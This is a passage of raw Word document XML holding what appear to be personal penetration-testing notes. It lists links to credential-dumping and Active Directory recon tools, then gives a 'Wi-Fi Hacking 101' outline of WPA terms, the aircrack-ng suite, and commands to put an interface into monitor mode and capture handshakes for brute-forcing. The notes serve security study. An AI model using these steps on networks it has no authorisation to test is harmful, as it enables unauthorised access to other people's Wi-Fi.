    <w:p w14:paraId="7C6A089E" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="007A6E65" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId95" w:history="1">
        <w:r w:rsidR="00DC7D6C" w:rsidRPr="00F512ED">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/gentilkiwi/mimikatz</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0AD986EB" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="007A6E65" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId96" w:history="1">
        <w:r w:rsidR="00DC7D6C" w:rsidRPr="00F512ED">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/BloodHoundAD/BloodHound/blob/master/Ingestors/SharpHound.ps1</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5619A00A" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="007A6E65" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId97" w:history="1">
        <w:r w:rsidR="00DC7D6C" w:rsidRPr="00F512ED">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0CA658A8" w14:textId="239586D4" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E5478D8" w14:textId="77777777" w:rsidR="00DE4665" w:rsidRPr="00F512ED" w:rsidRDefault="00DE4665" w:rsidP="00F512ED">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Wi-Fi Hacking 101</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19ACE4FE" w14:textId="77777777" w:rsidR="00DE4665" w:rsidRPr="00F512ED" w:rsidRDefault="00DE4665" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>An Intro to WPA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D994AE" w14:textId="77777777" w:rsidR="00DE4665" w:rsidRPr="00F512ED" w:rsidRDefault="00DE4665" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>SSID – network name seen when trying to connect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2997B9" w14:textId="77777777" w:rsidR="00DE4665" w:rsidRPr="00F512ED" w:rsidRDefault="00DE4665" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>ESSID – an SSID that may apply to multiple access points</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CAE7D1B" w14:textId="77777777" w:rsidR="00DE4665" w:rsidRPr="00F512ED" w:rsidRDefault="00DE4665" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>BSSID – access point MAC address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D025A09" w14:textId="77777777" w:rsidR="00DE4665" w:rsidRPr="00F512ED" w:rsidRDefault="00DE4665" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>WPA2-PSK – wifi networks that you can connect to by providing a password that is the same for everyone</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E44F452" w14:textId="77777777" w:rsidR="00DE4665" w:rsidRPr="00F512ED" w:rsidRDefault="00DE4665" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>WPA2-EAP – wifi networks that you can authenticate to by providing a username and password, sent to RADIUS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765DBA96" w14:textId="77777777" w:rsidR="00DE4665" w:rsidRPr="00F512ED" w:rsidRDefault="00DE4665" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>RADIUS – server for authenticating clients</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04CC13AB" w14:textId="77777777" w:rsidR="00DE4665" w:rsidRPr="00F512ED" w:rsidRDefault="00DE4665" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Core of WPA(2) authentication is the 4-way handshake</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241B2E50" w14:textId="77777777" w:rsidR="00DE4665" w:rsidRPr="00F512ED" w:rsidRDefault="00DE4665" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>most home wifi networks use WPA(2) personal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CC6677" w14:textId="77777777" w:rsidR="00DE4665" w:rsidRPr="00F512ED" w:rsidRDefault="00DE4665" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>if log in is required and it isn’t WEP, its WPA(2) personal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5983ADEF" w14:textId="77777777" w:rsidR="00DE4665" w:rsidRPr="00F512ED" w:rsidRDefault="00DE4665" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>username and password = WPA2-EAP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BB48756" w14:textId="77777777" w:rsidR="00DE4665" w:rsidRPr="00F512ED" w:rsidRDefault="00DE4665" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>can be brute forced</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B8BC18" w14:textId="77777777" w:rsidR="00DE4665" w:rsidRPr="00F512ED" w:rsidRDefault="00DE4665" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:lastRenderedPageBreak/>
        <w:t>keys for WPA are derived from both the ESSID and password for the network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1514B3FF" w14:textId="77777777" w:rsidR="00DE4665" w:rsidRPr="00F512ED" w:rsidRDefault="00DE4665" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>ESSID acts as a salt – making dictionary attacks more difficult</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5649F7DB" w14:textId="77777777" w:rsidR="00DE4665" w:rsidRPr="00F512ED" w:rsidRDefault="00DE4665" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Capturing Packets to Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB66B91" w14:textId="77777777" w:rsidR="00DE4665" w:rsidRPr="00F512ED" w:rsidRDefault="00DE4665" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Aircrack-ng suite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67497FCD" w14:textId="77777777" w:rsidR="00DE4665" w:rsidRPr="00F512ED" w:rsidRDefault="00DE4665" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t xml:space="preserve">    aircrack-ng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B8CB7E" w14:textId="77777777" w:rsidR="00DE4665" w:rsidRPr="00F512ED" w:rsidRDefault="00DE4665" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t xml:space="preserve">    airdecap-ng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11636975" w14:textId="77777777" w:rsidR="00DE4665" w:rsidRPr="00F512ED" w:rsidRDefault="00DE4665" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t xml:space="preserve">    airmon-ng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD16853" w14:textId="77777777" w:rsidR="00DE4665" w:rsidRPr="00F512ED" w:rsidRDefault="00DE4665" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t xml:space="preserve">    aireplay-ng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559C022E" w14:textId="77777777" w:rsidR="00DE4665" w:rsidRPr="00F512ED" w:rsidRDefault="00DE4665" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t xml:space="preserve">    airodump-ng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0C8A3B" w14:textId="77777777" w:rsidR="00DE4665" w:rsidRPr="00F512ED" w:rsidRDefault="00DE4665" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t xml:space="preserve">    airtun-ng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451FEC60" w14:textId="77777777" w:rsidR="00DE4665" w:rsidRPr="00F512ED" w:rsidRDefault="00DE4665" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t xml:space="preserve">    packetforge-ng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74BBEAC6" w14:textId="77777777" w:rsidR="00DE4665" w:rsidRPr="00F512ED" w:rsidRDefault="00DE4665" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t xml:space="preserve">    airbase-ng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682AAE34" w14:textId="77777777" w:rsidR="00DE4665" w:rsidRPr="00F512ED" w:rsidRDefault="00DE4665" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t xml:space="preserve">    airdecloak-ng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4869FFE5" w14:textId="77777777" w:rsidR="00DE4665" w:rsidRPr="00F512ED" w:rsidRDefault="00DE4665" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t xml:space="preserve">    airolib-ng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258AC976" w14:textId="77777777" w:rsidR="00DE4665" w:rsidRPr="00F512ED" w:rsidRDefault="00DE4665" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t xml:space="preserve">    airserv-ng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585F8277" w14:textId="77777777" w:rsidR="00DE4665" w:rsidRPr="00F512ED" w:rsidRDefault="00DE4665" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t xml:space="preserve">    buddy-ng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631CFDD3" w14:textId="77777777" w:rsidR="00DE4665" w:rsidRPr="00F512ED" w:rsidRDefault="00DE4665" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t xml:space="preserve">    ivstools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A426563" w14:textId="77777777" w:rsidR="00DE4665" w:rsidRPr="00F512ED" w:rsidRDefault="00DE4665" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t xml:space="preserve">    easside-ng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103869B9" w14:textId="77777777" w:rsidR="00DE4665" w:rsidRPr="00F512ED" w:rsidRDefault="00DE4665" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t xml:space="preserve">    tkiptun-ng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3CA11E" w14:textId="77777777" w:rsidR="00DE4665" w:rsidRPr="00F512ED" w:rsidRDefault="00DE4665" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t xml:space="preserve">    wesside-ng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FDDD9B" w14:textId="77777777" w:rsidR="00DE4665" w:rsidRPr="00F512ED" w:rsidRDefault="00DE4665" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>aircrack-ng, airodump-ng, airmon-ng to attack WPA networks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2B57C1" w14:textId="77777777" w:rsidR="00DE4665" w:rsidRPr="00F512ED" w:rsidRDefault="00DE4665" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>put interface wlan0 into monitor mode with Aircrack</w:t>
      </w:r>
      <w:r w:rsidRPr="00F512ED">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D255C9" w14:textId="77777777" w:rsidR="00DE4665" w:rsidRPr="00F512ED" w:rsidRDefault="00DE4665" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>airmon-ng start wlan0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A31F596" w14:textId="77777777" w:rsidR="00DE4665" w:rsidRPr="00F512ED" w:rsidRDefault="00DE4665" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>new interface name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A72ED2" w14:textId="77777777" w:rsidR="00DE4665" w:rsidRPr="00F512ED" w:rsidRDefault="00DE4665" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>wlan0mon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBBF206" w14:textId="77777777" w:rsidR="00DE4665" w:rsidRPr="00F512ED" w:rsidRDefault="00DE4665" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>If other processes are using network adaptor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E40B1D1" w14:textId="77777777" w:rsidR="00DE4665" w:rsidRPr="00F512ED" w:rsidRDefault="00DE4665" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>airmon-ng check kill</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F24609" w14:textId="77777777" w:rsidR="00DE4665" w:rsidRPr="00F512ED" w:rsidRDefault="00DE4665" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>To create a capture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0375C06F" w14:textId="77777777" w:rsidR="00DE4665" w:rsidRPr="00F512ED" w:rsidRDefault="00DE4665" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>airodump-ng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57640AC9" w14:textId="77777777" w:rsidR="00DE4665" w:rsidRPr="00F512ED" w:rsidRDefault="00DE4665" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>To set BSSID to monitor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FE9E28" w14:textId="77777777" w:rsidR="00DE4665" w:rsidRPr="00F512ED" w:rsidRDefault="00DE4665" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
